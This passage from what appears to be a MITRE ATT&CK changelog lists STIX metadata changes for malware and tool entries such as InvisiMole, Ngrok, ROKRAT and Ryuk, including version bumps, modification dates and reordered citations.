external_references[5]['url']https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
x_mitre_version1.01.1

[S0260] InvisiMole

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 17:45:34.380000+00:002021-11-29 12:41:28.009000+00:00
x_mitre_version2.02.1

[S0231] Invoke-PSImage

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors['Christiaan Beek, @ChristiaanBeek']
x_mitre_platforms['Windows']
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-10-18 22:02:48.228000+00:00
x_mitre_version1.01.1

[S0607] KillDisk

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 14:18:07.086000+00:002022-05-11 14:00:00.188000+00:00
x_mitre_version1.01.1

[S0500] MCMD

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-08-20 14:52:23.369000+00:002022-07-29 19:48:28.725000+00:00
x_mitre_version1.01.1

[S0084] Mis-Type

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[Mis-Type](https://attack.mitre.org/software/S0084) is a bact1[Mis-Type](https://attack.mitre.org/software/S0084) is a bac
>kdoor hybrid that was used by [Dust Storm](https://attack.mi>kdoor hybrid that was used in [Operation Dust Storm](https:/
>tre.org/groups/G0031) in 2012. (Citation: Cylance Dust Storm>/attack.mitre.org/campaigns/C0016by 2012.(Citation: Cylanc
>)>e Dust Storm)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 18:16:03.001000+00:002022-09-30 20:04:42.419000+00:00
description[Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) in 2012. (Citation: Cylance Dust Storm)[Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) by 2012.(Citation: Cylance Dust Storm)
external_references[1]['description']Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
external_references[1]['url']https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdfhttps://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf
x_mitre_version1.11.2

[S0083] Misdat

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[Misdat](https://attack.mitre.org/software/S0083) is a backdt1[Misdat](https://attack.mitre.org/software/S0083) is a backd
>oor that was used by [Dust Storm](https://attack.mitre.org/g>oor that was used in [Operation Dust Storm](https://attack.m
>roups/G0031) from 2010 to 2011. (Citation: Cylance Dust Stor>itre.org/campaigns/C0016) from 2010 to 2011.(Citation: Cylan
>m)>ce Dust Storm)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 18:16:26.920000+00:002022-09-30 21:01:41.137000+00:00
description[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2010 to 2011. (Citation: Cylance Dust Storm)[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) from 2010 to 2011.(Citation: Cylance Dust Storm)
external_references[1]['description']Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
external_references[1]['url']https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdfhttps://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf
x_mitre_version1.11.2

[S0508] Ngrok

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1[Ngrok](https://attack.mitre.org/software/S0508) is a legitit1[Ngrok](https://attack.mitre.org/software/S0508) is a legiti
>mate reverse proxy tool that can create a secure tunnel to s>mate reverse proxy tool that can create a secure tunnel to s
>ervers located behind firewalls or on local machines that do>ervers located behind firewalls or on local machines that do
> not have a public IP. [Ngrok](https://attack.mitre.org/soft> not have a public IP. [Ngrok](https://attack.mitre.org/soft
>ware/S0508) has been leveraged by threat actors in several c>ware/S0508) has been leveraged by threat actors in several c
>ampaigns including use for lateral movement and data exfiltr>ampaigns including use for lateral movement and data exfiltr
>ation.(Citation: Zdnet Ngrok September 2018)(Citation: FireE>ation.(Citation: Zdnet Ngrok September 2018)(Citation: FireE
>ye Maze May 2020)(Citation: Cyware Ngrok May 2019)>ye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation:
 > MalwareBytes LazyScripter Feb 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-09-29 20:46:04.658000+00:002022-04-06 19:49:28.441000+00:00
description[Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)[Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes LazyScripter Feb 2021)
external_references[2]['source_name']FireEye Maze May 2020Cyware Ngrok May 2019
external_references[2]['description']Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims’ systems. Retrieved September 15, 2020.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.htmlhttps://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44
external_references[3]['source_name']Cyware Ngrok May 2019MalwareBytes LazyScripter Feb 2021
external_references[3]['description']Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims’ systems. Retrieved September 15, 2020.Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021.
external_references[3]['url']https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye Maze May 2020', 'description': 'Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html'}

[S0402] OSX/Shlayer

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 20:44:20.719000+00:002022-10-19 16:35:18.493000+00:00
external_references[2]['source_name']ZshlayerCrossrider
external_references[2]['description'](Citation: sentinelone shlayer to zshlayer)(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)
external_references[3]['source_name']CrossriderZshlayer
external_references[3]['description'](Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)(Citation: sentinelone shlayer to zshlayer)
external_references[4]['url']https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html
external_references[7]['source_name']Intego Shlayer Apr 2018Malwarebytes Crossrider Apr 2018
external_references[7]['description']Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.
external_references[7]['url']https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/
external_references[8]['source_name']Malwarebytes Crossrider Apr 2018Intego Shlayer Apr 2018
external_references[8]['description']Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.
external_references[8]['url']https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/
x_mitre_version1.21.3

[S0352] OSX_OCEANLOTUS.D

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 01:59:21.279000+00:002022-01-14 21:53:00.543000+00:00
x_mitre_version2.12.2

[S0229] Orz

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 15:04:49.088000+00:002022-04-19 01:33:33.267000+00:00
external_references[1]['source_name']OrzAIRBREAK
external_references[1]['description'](Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)
external_references[2]['source_name']AIRBREAKOrz
external_references[2]['description'](Citation: FireEye Periscope March 2018)(Citation: Proofpoint Leviathan Oct 2017)
x_mitre_version2.12.2

[S0223] POWERSTATS

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-23 20:16:28.982000+00:002022-10-12 19:06:51.405000+00:00
external_references[1]['source_name']POWERSTATSPowermud
external_references[1]['description'](Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Symantec MuddyWater Dec 2018)
external_references[2]['source_name']PowermudPOWERSTATS
external_references[2]['description'](Citation: Symantec MuddyWater Dec 2018)(Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018)
external_references[3]['source_name']Unit 42 MuddyWater Nov 2017ClearSky MuddyWater Nov 2018
external_references[3]['description']Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
external_references[3]['url']https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
external_references[4]['source_name']ClearSky MuddyWater Nov 2018Unit 42 MuddyWater Nov 2017
external_references[4]['description']ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.
external_references[4]['url']https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdfhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/
x_mitre_version2.12.2

[S0613] PS1

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 12:58:20.120000+00:002022-10-05 16:04:51.193000+00:00
x_mitre_version1.01.1
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_aliasesPS1

[S0587] Penquin

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-09 17:35:29.546000+00:002022-10-20 04:12:29.037000+00:00
external_references[4]['url']https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdfhttps://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf
x_mitre_version1.01.1

[S0517] Pillowmint

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-06 17:25:07.301000+00:002022-07-29 19:50:27.063000+00:00
x_mitre_version1.01.1

[S0428] PoetRAT

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 21:20:30.634000+00:002022-04-19 01:41:29.396000+00:00
external_references[1]['source_name']Talos PoetRAT April 2020Dragos Threat Report 2020
external_references[1]['description']Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020.Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021.
external_references[1]['url']https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.htmlhttps://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770
external_references[2]['source_name']Talos PoetRAT October 2020Talos PoetRAT April 2020
external_references[2]['description']Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021.Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020.
external_references[2]['url']https://blog.talosintelligence.com/2020/10/poetrat-update.htmlhttps://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html
external_references[3]['source_name']Dragos Threat Report 2020Talos PoetRAT October 2020
external_references[3]['description']Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021.Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021.
external_references[3]['url']https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770https://blog.talosintelligence.com/2020/10/poetrat-update.html
x_mitre_version2.02.1

[S0378] PoshC2

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 13:59:23.129000+00:002022-06-03 17:45:36.186000+00:00
x_mitre_version1.21.3

[S0194] PowerSploit

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-05 01:24:41.497000+00:002022-09-27 18:18:15.392000+00:00
external_references[1]['source_name']GitHub PowerSploit May 2012PowerShellMagazine PowerSploit July 2014
external_references[1]['description']PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018.Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018.
external_references[1]['url']https://github.com/PowerShellMafia/PowerSploithttp://www.powershellmagazine.com/2014/07/08/powersploit/
external_references[2]['source_name']PowerShellMagazine PowerSploit July 2014GitHub PowerSploit May 2012
external_references[2]['description']Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018.PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018.
external_references[2]['url']http://www.powershellmagazine.com/2014/07/08/powersploit/https://github.com/PowerShellMafia/PowerSploit
x_mitre_version1.41.5

[S0113] Prikormka

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 02:39:23.582000+00:002022-04-19 01:42:59.312000+00:00
x_mitre_version1.21.3

[S0029] PsExec

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-06-24 13:47:24.660000+00:002022-09-28 14:47:20.421000+00:00
external_references[1]['source_name']Russinovich SysinternalsSANS PsExec
external_references[1]['description']Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.Pilkington, M.. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016.
external_references[1]['url']https://technet.microsoft.com/en-us/sysinternals/bb897553.aspxhttps://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-dive
external_references[2]['source_name']SANS PsExecRussinovich Sysinternals
external_references[2]['description']Pilkington, M.. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016.Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.
external_references[2]['url']https://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-divehttps://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
x_mitre_version1.21.3

[S0240] ROKRAT

Current version: 2.3

Version changed from: 2.2 → 2.3


Old Description
New Description
t1[ROKRAT](https://attack.mitre.org/software/S0240) is a cloudt1[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud
>-based remote access tool (RAT) used by [APT37](https://atta>-based remote access tool (RAT) used by [APT37](https://atta
>ck.mitre.org/groups/G0067). This software has been used to t>ck.mitre.org/groups/G0067) to target victims in South Korea.
>arget victims in South Korea. [APT37](https://attack.mitre.o> [APT37](https://attack.mitre.org/groups/G0067) has used ROK
>rg/groups/G0067) used ROKRAT during several campaigns in 201>RAT during several campaigns from 2016 through 2021.(Citatio
>6 through 2018. (Citation: Talos ROKRAT) (Citation: Talos Gr>n: Talos ROKRAT)(Citation: Talos Group123)(Citation: Volexit
>oup123)>y InkySquid RokRAT August 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-11-23 18:54:49.190000+00:002022-03-30 20:40:21.212000+00:00
description[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067). This software has been used to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) used ROKRAT during several campaigns in 2016 through 2018. (Citation: Talos ROKRAT) (Citation: Talos Group123)[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067) to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) has used ROKRAT during several campaigns from 2016 through 2021.(Citation: Talos ROKRAT)(Citation: Talos Group123)(Citation: Volexity InkySquid RokRAT August 2021)
external_references[4]['source_name']Talos ROKRAT 2Volexity InkySquid RokRAT August 2021
external_references[4]['description']Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018.Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.
external_references[4]['url']https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.htmlhttps://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Talos ROKRAT 2', 'description': 'Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018.', 'url': 'https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html'}

[S0148] RTM

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-07-03 22:22:05.857000+00:002022-07-29 19:51:00.660000+00:00
external_references[2]['source_name']ESET RTM Feb 2017Unit42 Redaman January 2019
external_references[2]['description']Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.
external_references[2]['url']https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdfhttps://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/
external_references[3]['source_name']Unit42 Redaman January 2019ESET RTM Feb 2017
external_references[3]['description']Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.
external_references[3]['url']https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf
x_mitre_version1.11.2

[S0075] Reg

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-08-23 20:25:18.606000+00:002022-10-13 20:23:35.333000+00:00
x_mitre_version1.01.1

[S0174] Responder

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['Responder']
x_mitre_platforms['Windows']
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-06 14:42:53.334000+00:00
x_mitre_version1.01.1

[S0446] Ryuk

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-08-18 19:31:22.741000+00:002022-05-24 21:10:44.381000+00:00
external_references[2]['source_name']CrowdStrike Ryuk January 2019Bleeping Computer - Ryuk WoL
external_references[2]['description']Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.
external_references[2]['url']https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/
external_references[4]['source_name']FireEye FIN6 Apr 2019CrowdStrike Ryuk January 2019
external_references[4]['description']McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.htmlhttps://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
external_references[5]['source_name']Bleeping Computer - Ryuk WoLFireEye FIN6 Apr 2019
external_references[5]['description']Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.
external_references[5]['url']https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
x_mitre_version1.21.3

[S0085] S-Type

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
